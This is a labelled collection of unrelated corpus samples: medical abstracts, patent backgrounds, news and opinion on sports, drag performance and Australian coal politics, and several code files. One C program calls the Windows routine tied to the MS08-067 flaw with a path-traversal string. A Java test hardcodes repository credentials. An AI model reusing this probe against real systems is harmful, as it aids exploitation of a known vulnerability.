Hydatid disease: a rare cause of adrenal cyst.
A case of hydatid cyst in the adrenal gland is presented. Eight cases have been previously reported. The diagnosis of an adrenal cyst is usually incidental, and the diagnosis of hydatid cyst is seldom made preoperatively. Surgical excision of the gland including the cyst is the treatment of choice.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
5 things you need to know in the sports business: Alibaba eyes Brooklyn Nets and more
Cavaliers revive stadium renovation plans
The Cleveland Cavaliers announced that they will be reviving their plans for a $140 million renovation to their home venue Quicken Loans Arena after the plan was initially scrapped last week. Included in the renovations are plans for the construction of a glass exterior and additional dining spaces, among other improvements. The team also announced they will be extending their lease with the facility for an additional seven years. The contract between the two parties will now run through at least 2034.
Sale of Brooklyn Nets is gaining interest
Earlier this summer, it was reported that Brooklyn Nets majority owner Mikhail Prokhorov was looking to sell a controlling stake in the team. A source close to the owner was quoted as saying that there would definitely be a new owner within the next two years, but it looks like something may come to fruition sooner than that.
The team has begun to gather interest from several parties, including one led by Alibaba Executive Vice Chair Joe Tsai. Tsai recently purchased a San Diego NLL team, and there have been rumors of his interest in purchasing the Nets for the last several months. According to Forbes, the Nets are valued at approximately $1.8 billion.
North Carolina close to renewing Nike contract
According to North Carolina athletic director Bubba Cunningham, the university is on the verge of renewing its apparel contract with Nike. He stated that the two sides have been working together on an extension and should have it completed in the next couple of months. The University of North Carolina is one of the brand’s select schools that are outfitted with Jordan brand apparel for basketball season, and just this year the school joined the University of Michigan in also wearing Jordan apparel during football season.
The University of North Carolina is on the verge of renewing its contract with Nike.
Multiple bids received for renaming of Qualcomm Stadium
A Fox Sports Properties executive is handling the official bidding for the renaming of Qualcomm Stadium, the former San Diego Chargers home. According to the executive, bids have been submitted by “less than 10 companies or institutions,” and he is very pleased with the companies that have come forward.
He declined to identify any of the candidates but said that the public would be happy with whoever ends up winning the rights. The naming rights are only good through the end of 2018 when the city plans to close the stadium.
NBA could change draft lottery process
According to Adrian Wojnarowski of ESPN, the NBA is looking to reform its draft lottery process and could implement changes before the 2019 draft. According to the report, NBA commissioner Adam Silver is a strong advocate of lowering the odds for the worst-finishing teams in the league as a potential solution to the tanking problem the league has faced in recent years. A similar solution was suggested back in 2014, but it did not receive enough support to take effect.
—
DISCLAIMER: This article expresses my own ideas and opinions. Any information I have shared is from sources that I believe to be reliable and accurate. I did not receive any financial compensation for writing this post, nor do I own shares in any company I’ve mentioned. I encourage every reader to do their own diligent research before making any investment decisions.
|
{
"pile_set_name": "Pile-CC"
}
|
1. Field of the Invention
This invention relates to craftsman's tools and more particularly to tools designed to produce a straight, smooth edge on a piece of lumber or other material which may have a "crook" or flat bow or rough mill edges.
2. Description of the Prior Art
In working with sheets or boards of raw material, such as wood, plywood, or masonite, there is always an interest in minimizing costs to maximize profits and reduce waste. For instance, in woodworking, one can save substantial amounts of money by purchasing unfinished, rough mill lumber. Sometimes, the desired lumber is only available in unfinished form. Regardless, the raw material needs at least one straight, smooth edge as a reference edge for future shaping and cutting.
Prior art discloses devices or tools developed to take advantage of the lower prices for rough cut lumber, while seeking ways to guarantee straight edges on lumber and other building materials to be used as furniture, cabinets, counter tops, wall boards, paneling, and for many other purposes including, but not limited to, general construction purposes.
In general, these prior art devices include independent clamps of various designs and flat bars which use clamps or screws for attachment to the lumber or other material to be cut.
A typical prior art device comprises two clamps. One end of each clamp is tightened around one edge of a known straight board; the other end is tightened to the bowed board. The unobstructed end of the straight board is then used as the contact surface to a saw fence or guide to make a straight cut along the bowed board. This method requires constant examination of the straight board for warping or damage from use, and constant checking of the integrity and tightness of the clamps to prevent relative movement between the straight and bowed lumber before and during sawing.
Other prior art devices include cutting guides usually made of aluminum. Some of these are of fixed length while others can be lengthened for cutting longer pieces of wood, wallboard, masonite, and paneling. These devices attach by clamps to the board being cut. These clamps may be the well-known "C" clamps (screw type). In use, a plurality of "C" clamps are placed around both the guide and the board and hold them together by frictional forces created by compression across the thickness of the guide and the board.
Alternatively, jaw-type clamps may be used. A plurality of these clamps are typically rigidly attached to the underside of the guide. The jaws then are positioned around the board to be cut across its thickness and are clamped shut by pressing a lever. As with the "C" clamps, the board is held relative to the guide by frictional forces created by compression across the thickness of the board.
All of these prior art devices are very difficult to use with a saw fence due to the interference caused by clamps protruding to the side or below the surface of the board to be cut. Furthermore, the intense vibrational forces occurring during sawing often loosen the compression-type hold on the board, resulting in board movement and a non-straight cut along the board.
Thus, there remains a significant need for a tool or saw guide designed to eliminate the flat bow out of rough cut mill lumber of varying lengths or other materials and provide a near perfect saw cut edge while also allowing the use of a standard table saw, radial saw, or circular saw.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Tissue alterations in urethral and vaginal walls related to multiparity in rabbits.
In rodents, vaginal distention after delivery or experimental manipulation affects innervation as well as the amount of striated/smooth musculature or collagen in both the urethra and vagina. These changes are associated with modifications in excretory and reproductive processes. Although successive and consecutive vaginal deliveries (multiparity) affect the contractile and functional properties of the female lower urogenital tract (LUT), their impact on LUT morphometry, including its persistence, has been barely studied. The caudal urethra (CU) and cranial (V1) and caudal (V2) pelvic vaginal regions were excised from young and adult nulliparous (YN and AN, respectively) and multiparous (YM and AM, respectively) rabbits. Tissues were histologically processed and stained with Masson's trichrome. The thickness of the tissue layers and the areas covered by tissue components were measured and compared using two-way ANOVA followed by Student-Newman-Keuls tests to determine statistical differences (P ≤ 0.05). Compared to YN tissues, YM and AN tissues showed a reduction in the thickness of the epithelium, as well as in the areas covered by striated musculature, collagen, and blood vessels of the LUT. In comparison with YM, only some morphometric changes were recovered in the AM group. Our study shows that multiparity and age can be associated with epithelial and muscular atrophy of the urethral and vaginal walls. The morphometry of the LUT in young and adult female rabbits varies with multiparity. These findings may help to better understand the effects of multiparity on young and adult females and its correlation with the development of pelvic dysfunctions.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
#include <windows.h>
#include <stdio.h>

/* Signature of netapi32!NetpwPathCanonicalize, an undocumented internal API
 * (the path-canonicalization routine involved in the MS08-067 vulnerability). */
typedef int (__stdcall *MYPROC)(LPWSTR, LPWSTR, DWORD, LPWSTR, LPDWORD, DWORD);

int main(int argc, char* argv[])
{
    WCHAR path[256];
    WCHAR can_path[256];
    DWORD type = 1000;
    int retval;

    /* Load a copy of netapi32.dll from the current directory. */
    HMODULE handle = LoadLibrary(".\\netapi32.dll");
    MYPROC Trigger = NULL;

    if (NULL == handle)
    {
        wprintf(L"Failed to load library!\n");
        return -1;
    }

    /* Resolve the unexported-by-header function by name. */
    Trigger = (MYPROC)GetProcAddress(handle, "NetpwPathCanonicalize");
    if (NULL == Trigger)
    {
        FreeLibrary(handle);
        wprintf(L"Failed to get API address!\n");
        return -1;
    }

    /* Canonicalize a path containing "..\" traversal components. */
    path[0] = 0;
    wcscpy(path, L"\\aaa\\..\\..\\bbbb");
    can_path[0] = 0;
    type = 1000;

    wprintf(L"BEFORE: %s\n", path);
    retval = (Trigger)(path, can_path, 1000, NULL, &type, 1);
    wprintf(L"AFTER : %s\n", can_path);
    wprintf(L"RETVAL: %s(0x%X)\n\n", retval ? L"FAIL" : L"SUCCESS", retval);

    FreeLibrary(handle);
    return 0;
}
|
{
"pile_set_name": "Github"
}
|
BenDeLaCreme will certainly go down as one of the most memorable queens in Drag Race herstory. Her initial appearance on the show in Season 6 certainly gave fans much to remember. Not only did she win the title of “Miss Congeniality”, but there was also her memorable turn as Maggie Smith in “Snatch Game”; the fact that when she landed in the bottom two, RuPaul performed the rare trick of saving both queens — specifically noting a desire to see more from DeLa; and of course her often uncanny resemblance to Drag Race judge Michelle Visage.
It’s worth remembering that Visage called DeLa out during that season, saying she didn’t feel she’d gotten a sense of the queen’s identity. DeLa was hurt at the time, defending the BenDeLaCreme character as the embodiment of everything that she was. In retrospect, perhaps it wasn’t that we hadn’t gotten to know the character but that we hadn’t gotten to know the difference between her two characters. Where did the realness of drag performer Benjamin Putnam end and the airy Mary sweetness of the DeLa character begin?
Between Season 6 and her return on All Stars 3, each seemed to click into sharper focus. In talking head interviews as Ben — adorably attired in a purple bow tie and matching Jughead-style hat — he was smart, witty and thoughtful. Meanwhile, in drag, DeLa had become bigger, bouncier, funnier and more versatile than ever. This growth was rewarded with an incredible five main challenge wins and three “Lip Sync for Your Legacy” victories — certainly making her one of the winningest queens to ever compete on Drag Race.
In our exclusive interview, DeLa offers some rare insights about both the frenzied pace of the Race and the intensity of the competition overall. She also makes a thoughtful plea to viewers of Drag Race to watch with kindness, one that seems prescient considering the recent spate of racially charged social media hate directed at one of the contestants of color. And though we would have gladly seen her take the All Stars 3 crown, it’s possible that she created an even more memorable moment than winning with her controversial decision to send herself home. Regardless, DeLa, you’ll always be a winner to us.
Last modified: February 14, 2019
|
{
"pile_set_name": "OpenWebText2"
}
|
Can you imagine reading in the Star-Telegram a headline like "TRWD Planning for $1 Billion Trinity Uptown Vision Project & Public Vote"?
Read the "Sound Transit planning heats up for light-rail expansion and public vote" article. Make note of how detailed the article is. Make note that the article mentions project timelines. Make note that the article details the issues being faced by Sound Transit prior to putting the $15 billion project to a public vote. Make note of how big the project is, covering three counties, each of which is way bigger than Tarrant County.
In Tarrant County there is no comprehensive public transit covering the entire, small, heavily populated county. Only Fort Worth has any form of public transit, that being a fleet of little buses which run on limited routes and a train which travels to Dallas and back several times a day.
A few days ago Elsie Hotpepper sent me that which you see below, which succinctly sums up how the developed, progressive parts of America and the world view public transportation.
Meanwhile, in Tarrant County, apparently, or so I have been told, most of the locals think only poor people use public transit....
|
{
"pile_set_name": "Pile-CC"
}
|
The OARSI histopathology initiative - recommendations for histological assessments of osteoarthritis in sheep and goats.
Sheep and goats are commonly used large animal species for studying pathogenesis and treatment of osteoarthritis (OA). This review focuses on the macroscopic and microscopic criteria for assessing OA in sheep and goats and recommends particular assessment criteria to assist standardization in the conduct and reporting of preclinical trials of OA. A review was conducted of all published OA studies using sheep and goats and the most common macroscopic, microscopic, or ultrastructural scoring systems were summarised. General recommendations regarding methods of OA assessment in the sheep and goat have been made and a preliminary study of their reliability and utility was undertaken. The modified Mankin scoring system is recommended for semiquantitative histological assessment of OA due to its already widespread adoption, ease of use, similarity to scoring systems used for OA in humans, and its achievable inter-rater reliability. Specific recommendations are also provided for histological scoring of synovitis and scoring of macroscopic lesions of OA. The proposed system for assessment of sheep and goat articular tissues appears to provide a useful versatile method to quantify OA change. It is hoped that by adopting more standardised quantitative outcome measures, better comparison between different studies and arthritis models will be possible. The suggested scoring systems can be modified in the future as our knowledge of disease pathophysiology advances.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Each book has a unique sketch inside! Order the new book by Peter Han, as part of his successful Kickstarter Campaign. Printed on 250 gsm "Tintoretto" Italian paper, it closely resembles the paper Peter used in his original journals. Filled with information, the first half of the book covers organic forms, while the second half delves into the mechanical. Step into Peter's sketchbook, look at his original thought process and read his own handwriting.
|
{
"pile_set_name": "Pile-CC"
}
|
1. Field of the Invention
This invention relates to a method of hydroformylating olefinic compounds. More particularly, the invention relates to a method of hydroformylating an olefinic compound into the corresponding aldehyde in an organic solvent and in the presence of a rhodium complex and a trisubstituted phosphine, there being added to the reaction system at least one diphosphino compound of general formula (I) ##STR3## wherein A.sup.1 and A.sup.2, respectively, are aryl groups; R.sup.1 and R.sup.2, respectively, are an aryl group or a saturated hydrocarbon residue of 1 or more carbon atoms; and ##STR4## represents a substituted or unsubstituted alicyclic hydrocarbon group of 3 to 6 carbon atoms in the main ring, in a proportion of 0.20 to 5.0 equivalents per rhodium atom in said rhodium complex to thereby achieve a substantial prolongation of catalyst activity and, consequently, achieve a more advantageous hydroformylation of the olefinic compound.
2. Description of the Prior Art
There is known a hydroformylation reaction in which an olefin, exemplified by ethylene, propylene and butene, is reacted with a gaseous hydrogen-carbon monoxide mixture in an organic solvent and in the presence of a rhodium complex and a trisubstituted phosphine to obtain an aldehyde containing one more carbon atom than the starting olefin. The reaction has been commercially utilized, for example, in the production of butyraldehyde from propylene.
The rhodium complex as used for catalyzing the hydroformylation reaction is suited for industrial practice in that it helps perform the reaction under considerably milder conditions (lower temperature and pressure) than does a cobalt catalyst and that it contributes to a higher selectivity for normal-aldehyde. However, since the rhodium complex is quite expensive, the industrial value of a hydroformylation reaction with this complex depends largely on the catalyst life of the complex. Therefore, much research has heretofore been done and many proposals made in connection with means of maintaining the activity of the catalyst for an extended time under hydroformylating conditions. These methods may be roughly classified into three categories:
(1) A method in which the contemplated reaction is carried out while various reaction conditions such as the concentrations of the rhodium catalyst and trisubstituted phosphine, the partial pressure of carbon monoxide and the reaction temperature are controlled, each within a defined range, so as to suppress thermal degradation of the rhodium complex and formation of an inactive highly-carbonylated rhodium complex, e.g. see, German Patent Application (abbreviated as DTOS) 2,715,685;
(2) A method in which a small amount of oxygen is allowed to be present in the reaction system, e.g. see, DTOS 2,730,527;
(3) A method in which the reaction is carried out while the concentration of poisonous high-boiling byproducts in the reaction system is maintained below a certain level, e.g., see British Pat. No. 1,338,237 and British Pat. No. 1,545,706.
These hitherto-proposed methods, however, have room for improvement when industrial applications are envisaged. The first method (1) is commercially disadvantageous in that any drop in reaction temperature and any increase in concentration of the trisubstituted phosphine result in a reduced reaction rate which would require use of the expensive rhodium catalyst in an increased concentration in order to compensate for the reduction of reaction rate. With respect to the second method (2), the trisubstituted phosphine and the end product aldehyde are unstable against oxygen and tend to be converted to the substituted phosphine oxide and organic carboxylic acid, respectively, with the result that not only is the catalyst activity reduced but there are induced undesirable secondary reactions of the product aldehyde. The third method (3) is disadvantageous in that maintaining the concentration of high-boiling byproducts acting as catalyst poisons below a certain level is industrially equivalent to frequent regeneration, activation and recovery of the rhodium catalyst which are, of necessity, accompanied by losses of the rhodium catalyst and trisubstituted phosphine. Even by the above methods, a depression of catalyst activity is frequently encountered during the reaction and it has been inevitable to carry out the regeneration, activation and recovery of the rhodium catalyst with a fair frequency. This not only means a complicated procedure but also entails losses of the rhodium catalyst and trisubstituted phosphine in the regeneration step. Thus, the conventional methods for maintaining the activity of the rhodium catalyst leave much room for improvement.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Electronic messaging systems, such as email, Instant Messenger, and social networking sites, are commonly used for communication both within and outside the workplace. Generally, a user composes an electronic message with information to be received and reviewed by a recipient. The electronic message received by the recipient can be stored, replied to, or forwarded to other recipients, which can result in the addition or deletion of content and recipients. Thus, organization, sharing, and distribution of the information through the electronic messaging systems can be overwhelming and difficult to manage due to the changing environment.
Current electronic messaging systems offer keyword searches to identify electronic messages. However, keyword searches are limited since the keyword must appear in the content of the electronic message, and recipients often have no control over that content. Commonly, the electronic messaging systems also provide a list or “address book” of potential recipients for addressing electronic messages for delivery. However, the list fails to identify which recipients are interested in receiving electronic messages regarding a particular subject matter, and a user may be unable to determine the appropriate recipients or obtain email addresses for them.
Content tagging systems are available to organize electronic information gathered by users using tags. The tags are assigned to a piece of electronic information and can describe its topic or content, which allows users to easily find the tagged information through a tag search. Conventional tagging systems include Delicious and Diigo. However, use of the current tagging systems can be impractical and burdensome due to the need to incorporate a separate system into a user's daily routine. For example, the tagging system must be installed on each user client and registered with the appropriate server. Thus, the tagging systems are not easily incorporated. Also, the tagging systems fail to generate and maintain associations between tags, electronic information, and users.
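The kind of associations the preceding paragraphs describe (tag-to-item for search, tag-to-user for finding interested recipients) can be illustrated with a minimal sketch; this is not code from the patent, and all names (TagIndex, message ids, users) are invented for illustration:

```python
from collections import defaultdict

class TagIndex:
    """Toy in-memory index linking tags, tagged items, and the users who applied them."""

    def __init__(self):
        self.items_by_tag = defaultdict(set)   # tag -> ids of tagged items
        self.users_by_tag = defaultdict(set)   # tag -> users who used the tag

    def tag_item(self, user, item_id, *tags):
        for tag in tags:
            self.items_by_tag[tag].add(item_id)
            self.users_by_tag[tag].add(user)

    def search(self, tag):
        """Tag search: find items regardless of their message content."""
        return sorted(self.items_by_tag[tag])

    def interested_users(self, tag):
        """Candidate recipients for messages about this topic."""
        return sorted(self.users_by_tag[tag])

index = TagIndex()
index.tag_item("alice", "msg-1", "budget", "q3")
index.tag_item("bob", "msg-2", "budget")
print(index.search("budget"))            # ['msg-1', 'msg-2']
print(index.interested_users("budget"))  # ['alice', 'bob']
```

The point of the sketch is that the same tagging action feeds both lookups, which is exactly the tag-item-user association the paragraph says conventional systems fail to maintain.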
Further, content sharing systems, such as wiki workplaces and boundaryless organizations, emphasize group collaboration with user interest being broadcast and user participation changing over time. However, the dynamics of the content sharing systems are often difficult to manage due to the constantly changing environment and fail to address generating and maintaining groups of users based on interest in particular subject matter.
Thus, a system and method for unobtrusively integrating content tagging and distribution with existing communication structures and services is needed.
|
{
"pile_set_name": "USPTO Backgrounds"
}
|
Recommender engine for continuous-time quantum Monte Carlo methods.
Recommender systems play an essential role in the modern business world. They recommend favorable items such as books, movies, and search queries to users based on their past preferences. Applying similar ideas and techniques to Monte Carlo simulations of physical systems boosts their efficiency without sacrificing accuracy. Exploiting the quantum to classical mapping inherent in the continuous-time quantum Monte Carlo methods, we construct a classical molecular gas model to reproduce the quantum distributions. We then utilize powerful molecular simulation techniques to propose efficient quantum Monte Carlo updates. The recommender engine approach provides a general way to speed up the quantum impurity solvers.
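The abstract's core idea, using a model fitted to past samples to "recommend" efficient update proposals, can be illustrated with a toy independence Metropolis sampler. This is not the paper's algorithm: the Gaussian target, the refit schedule, and the proposal family below are all invented for illustration, and the periodic refitting makes the scheme adaptive (a production sampler would need care with ergodicity):

```python
import math
import random

def log_target(x):
    """Unnormalized log density of a toy target, N(2, 1)."""
    return -0.5 * (x - 2.0) ** 2

def log_proposal(x, mu, sigma):
    """Log density of the fitted Gaussian proposal (constants omitted; they cancel)."""
    return -0.5 * ((x - mu) / sigma) ** 2 - math.log(sigma)

def run_chain(steps, seed=0):
    rng = random.Random(seed)
    x = 0.0
    samples = [x]
    mu, sigma = 0.0, 2.0  # initial, deliberately poor, proposal model
    for step in range(steps):
        cand = rng.gauss(mu, sigma)
        # Independence-sampler acceptance ratio: min(1, p(x') q(x) / (p(x) q(x')))
        log_alpha = (log_target(cand) - log_target(x)
                     + log_proposal(x, mu, sigma)
                     - log_proposal(cand, mu, sigma))
        if math.log(rng.random()) < log_alpha:
            x = cand
        samples.append(x)
        # Periodically "re-fit" the recommender to the chain's own history.
        if step % 500 == 499:
            mean = sum(samples) / len(samples)
            var = sum((s - mean) ** 2 for s in samples) / len(samples)
            mu, sigma = mean, max(math.sqrt(var), 0.1)
    return samples

samples = run_chain(5000)
burn = samples[1000:]
print(sum(burn) / len(burn))  # close to the target mean of 2.0
```

As the fitted proposal approaches the target, the acceptance rate rises, which is the sense in which a learned model can speed up a Monte Carlo sampler without biasing it.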
|
{
"pile_set_name": "PubMed Abstracts"
}
|
/*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.apache.stratos.python.cartridge.agent.integration.tests;
import org.apache.commons.logging.Log;
import org.apache.commons.logging.LogFactory;
import org.apache.stratos.common.domain.LoadBalancingIPType;
import org.apache.stratos.messaging.domain.topology.*;
import org.apache.stratos.messaging.event.instance.notifier.ArtifactUpdatedEvent;
import org.apache.stratos.messaging.event.topology.CompleteTopologyEvent;
import org.apache.stratos.messaging.event.topology.MemberInitializedEvent;
import org.testng.annotations.AfterMethod;
import org.testng.annotations.BeforeMethod;
import org.testng.annotations.Test;
import java.io.File;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.ArrayList;
import java.util.List;
import java.util.Properties;
/**
 * Tests the agent termination flow triggered by the terminator.txt file.
*/
public class AgentTerminationTestCase extends PythonAgentIntegrationTest {
public AgentTerminationTestCase() throws IOException {
}
@Override
protected String getClassName() {
return this.getClass().getSimpleName();
}
private static final Log log = LogFactory.getLog(AgentTerminationTestCase.class);
private static final int TIMEOUT = 300000;
private static final String CLUSTER_ID = "tomcat.domain";
private static final String APPLICATION_PATH = "/tmp/AgentTerminationTestCase";
private static final String DEPLOYMENT_POLICY_NAME = "deployment-policy-6";
private static final String AUTOSCALING_POLICY_NAME = "autoscaling-policy-6";
private static final String APP_ID = "application-6";
private static final String MEMBER_ID = "tomcat.member-1";
private static final String INSTANCE_ID = "instance-1";
private static final String CLUSTER_INSTANCE_ID = "cluster-1-instance-1";
private static final String NETWORK_PARTITION_ID = "network-partition-1";
private static final String PARTITION_ID = "partition-1";
private static final String TENANT_ID = "6";
private static final String SERVICE_NAME = "tomcat";
@BeforeMethod(alwaysRun = true)
public void setup() throws Exception {
System.setProperty("jndi.properties.dir", getCommonResourcesPath());
super.setup(TIMEOUT);
startServerSocket(8080);
}
@AfterMethod(alwaysRun = true)
public void tearDownAgentTerminationTest(){
tearDown(APPLICATION_PATH);
}
@Test(groups = {"smoke"})
public void testAgentTerminationByFile() throws IOException {
startCommunicatorThread();
assertAgentActivation();
sleep(5000);
String terminatorFilePath = agentPath + PATH_SEP + "terminator.txt";
log.info("Writing termination flag to " + terminatorFilePath);
File terminatorFile = new File(terminatorFilePath);
String msg = "true";
Files.write(Paths.get(terminatorFile.getAbsolutePath()), msg.getBytes());
log.info("Waiting until agent reads termination flag");
sleep(50000);
List<String> outputLines = new ArrayList<>();
boolean exit = false;
while (!exit) {
List<String> newLines = getNewLines(outputLines, outputStream.toString());
if (newLines.size() > 0) {
for (String line : newLines) {
if (line.contains("Shutting down Stratos cartridge agent...")) {
log.info("Cartridge agent shutdown successfully");
exit = true;
}
}
}
sleep(1000);
}
}
private void assertAgentActivation() {
Thread startupTestThread = new Thread(new Runnable() {
@Override
public void run() {
while (!eventReceiverInitialized) {
sleep(1000);
}
List<String> outputLines = new ArrayList<>();
while (!outputStream.isClosed()) {
List<String> newLines = getNewLines(outputLines, outputStream.toString());
if (newLines.size() > 0) {
for (String line : newLines) {
if (line.contains("Subscribed to 'topology/#'")) {
sleep(2000);
// Send complete topology event
log.info("Publishing complete topology event...");
Topology topology = PythonAgentIntegrationTest.createTestTopology(
SERVICE_NAME,
CLUSTER_ID,
DEPLOYMENT_POLICY_NAME,
AUTOSCALING_POLICY_NAME,
APP_ID,
MEMBER_ID,
CLUSTER_INSTANCE_ID,
NETWORK_PARTITION_ID,
PARTITION_ID,
ServiceType.SingleTenant);
CompleteTopologyEvent completeTopologyEvent = new CompleteTopologyEvent(topology);
publishEvent(completeTopologyEvent);
log.info("Complete topology event published");
// Publish member initialized event
log.info("Publishing member initialized event...");
MemberInitializedEvent memberInitializedEvent = new MemberInitializedEvent(SERVICE_NAME,
CLUSTER_ID, CLUSTER_INSTANCE_ID, MEMBER_ID, NETWORK_PARTITION_ID, PARTITION_ID,
INSTANCE_ID);
publishEvent(memberInitializedEvent);
log.info("Member initialized event published");
}
// Send artifact updated event to activate the instance first
if (line.contains("Artifact repository found")) {
publishEvent(getArtifactUpdatedEventForPrivateRepo());
log.info("Artifact updated event published");
}
}
}
sleep(1000);
}
}
});
startupTestThread.start();
while (!instanceStarted || !instanceActivated) {
// wait until the instance activated event is received.
// this will assert whether instance got activated within timeout period; no need for explicit assertions
sleep(2000);
}
}
public static ArtifactUpdatedEvent getArtifactUpdatedEventForPrivateRepo() {
ArtifactUpdatedEvent privateRepoEvent = createTestArtifactUpdatedEvent();
privateRepoEvent.setRepoURL("https://bitbucket.org/testapache2211/testrepo.git");
privateRepoEvent.setRepoUserName("testapache2211");
privateRepoEvent.setRepoPassword("iF7qT+BKKPE3PGV1TeDsJA==");
return privateRepoEvent;
}
private static ArtifactUpdatedEvent createTestArtifactUpdatedEvent() {
ArtifactUpdatedEvent artifactUpdatedEvent = new ArtifactUpdatedEvent();
artifactUpdatedEvent.setClusterId(CLUSTER_ID);
artifactUpdatedEvent.setTenantId(TENANT_ID);
return artifactUpdatedEvent;
}
}
|
{
"pile_set_name": "Github"
}
|
Immunization Recommendations for Pediatric Patients with Chronic Kidney Disease, Nephrotic Syndrome, and Renal Transplants: A Literature Review and Quality Improvement Project.
Pediatric patients with chronic kidney disease (CKD) have an increased risk of developing vaccine-preventable diseases due to reduced immunization coverage. Studies have demonstrated that reduced immunization coverage in this population is related to barriers, such as frequent hospitalization, lack of knowledge, and concerns about safety and efficacy. This article examines a nurse practitioner-led quality improvement project (QIP) conducted in an outpatient pediatric nephrology clinic. The QIP focused on educating pediatric providers related to age-appropriate immunizations for children with CKD or nephrotic syndrome, and those who are renal transplant candidates and recipients. A process is now in place to review immunization records upon initial visit and annually, and to notify primary care providers of current recommendations for this population.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
Cambridge, MA: Harvard University Press, 1987. The figure of Salomon Maimon. Jerusalem: Magnes Press, 1967. The interpretation of Thought: Maimonian Skepticism and the reverse between Thoughts and Objects.
|
{
"pile_set_name": "Pile-CC"
}
|
<?php
/**
* This file is part of the Carbon package.
*
* (c) Brian Nesbitt <brian@nesbot.com>
*
* For the full copyright and license information, please view the LICENSE
* file that was distributed with this source code.
*/
return require __DIR__.'/et.php';
|
{
"pile_set_name": "Github"
}
|
#ifndef _PART_DRIVER_H
#define _PART_DRIVER_H 1
int part_connect(mass_dev* dev);
void part_disconnect(mass_dev* dev);
#endif
|
{
"pile_set_name": "Github"
}
|
A novel variant of Gh_D02G0276 is required for root-knot nematode resistance on chromosome 14 (D02) in Upland cotton.
MAGIC population sequencing and virus-induced gene silencing identify Gh_D02G0276 as a novel root-knot nematode resistance gene on chromosome 14 in Upland cotton. The southern root-knot nematode [RKN; Meloidogyne incognita (Kofoid & White)] remains the primary yield-limiting biotic stress to Upland cotton (Gossypium hirsutum L.) throughout the southeastern USA. While useful genetic markers have been developed for two major RKN resistance loci on chromosomes 11 (A11) and 14 (D02), these markers are not completely effective because the causative genes have not been identified. Here, we sequenced 550 recombinant inbred lines (RILs) from a multi-parent advanced generation intercross (MAGIC) population to identify five RILs that had informative recombinations near the D02-RKN resistance locus. The RKN resistance phenotypes of these five RILs narrowed the D02-RKN locus to a 30-kb region with four candidate genes. We conducted virus-induced gene silencing (VIGS) on each of these genes and found that Gh_D02G0276 was required for suppression of RKN egg production conferred by the Chr. D02 resistance gene. The resistant lines all possessed an allele of Gh_D02G0276 that showed non-synonymous mutations and was prematurely truncated. Furthermore, a Gh_D02G0276-specific marker for the resistance allele variant was able to identify RKN-resistant germplasm from a collection of 367 cotton accessions. The Gh_D02G0276 peptide shares similarity with domesticated hAT-like transposases with additional novel N- and C-terminal domains that resemble the target of known RKN effector molecules and a prokaryotic motif, respectively. The truncation in the resistance allele results in a loss of a plant nuclear gene-specific C-terminal motif, potentially rendering this domain antigenic due to its high homology with bacterial proteins. 
The conclusive identification of this RKN resistance gene opens new avenues for understanding plant resistance mechanisms to RKN as well as opportunities to develop more efficient marker-assisted selection in cotton breeding programs.
|
{
"pile_set_name": "PubMed Abstracts"
}
|
There is nowhere else on the planet right now where the dichotomy between two potential futures – one where we address the climate change crisis, one where we ignore this momentous threat and continue with business as usual – is playing out in such a dramatic and explosive way as Australia.
In the US, Donald Trump is decimating decades of hard-fought environmental and climate standards – it’s all 18th century all the time. But the ageing fossil fuel assets and recent “market failure” of the Australian electricity grid is pushing political leaders to all-out brawling, pitting conservative inaction against the demand for solution-focused action.
A recent wave of blackouts and near misses and the proposal of the biggest coalmine in the world – the Adani Carmichael mine in Queensland – has created tinder-dry conditions that only needed one spark to go up in flames.
The spark finally came recently, via Twitter, from renewable energy entrepreneur Elon Musk who offered to sell the batteries that would remove the last argument against renewable power.
It turned the deadlocked debate over how to fix Australia’s fossil fuel-laden and often failing energy “market” into an open war between those backing the dying coal industry and those set on using the moment to transition to renewable energy.
Indeed, one of the icons of the ageing coal fleet, the dirtiest coal power station in the developed world – Hazelwood in Victoria – turns off its turbines this week as it shuts down. The symbols couldn’t be clearer: Musk’s batteries or Adani’s mega-mine and dirty coal power. Which one represents the future?
As you formulate the answer, remember that the war is of course playing out against a tragic backdrop: the ongoing destruction of the Great Barrier Reef that is Australia’s great natural treasure, the thing it’s been charged by the world to protect. That horror is a human-created disaster, caused directly by man-made global warming that is increasing ocean temperatures at an alarming rate.
The decision about the future is also a decision about what kind of democracy you want. As in the US, the Aussie mining industry has for decades had a disproportionate amount of power over politicians. It cares about one thing only – not the greater good, but its own perpetuation.
But now the coal industry is starting to lose its grip. And it won’t necessarily be a slow process. The fractures are running through all strata of Australian governance: states are closing coal stations and opting for renewable energy and battery storage (a la the Musk tweet); companies and businesses that have traditionally been allies of the coal industry are advocating for climate policies that would essentially spell the end of coal-powered energy; and individuals and communities in great numbers are breaking free of the grid.
A marooned and thoroughly isolated Malcolm Turnbull is left on the losing side advocating for an industry and a coalmine we all know he doesn’t believe in to appease a small number of rightwingers in his party so he can continue to call himself the prime minister. Without a doubt, he will be swept aside by the arc of change – he who had the chance to lead on the issue of our time but chose to give in to vested interests and the fringe of his party.
As your electricity grid fails and industry holds on to the myth of an ever-growing coal export industry, Australians must draw a line in the sand and decide whether they continue to support coal, or whether the future is renewable.
Backed against the wall, the coal lobby and Turnbull’s fossil fuel-obsessed colleagues have gambled everything on the construction of the Adani coalmine. This mine would be the largest coalmine in history and, if constructed, it would do much to push the planet beyond 2C of warming.
The politics of coal are changing and this mine is that line in the sand.
Last week a historic alliance of environmental groups representing more than 1.5 million people launched the largest climate movement in Australia’s history.
Led by Bob Brown, who I had the honour of meeting last year, the battle to stop Adani is shaping up as the most important environmental fight ever down under, the likes of the Tar Sands battle we’ve seen in North America.
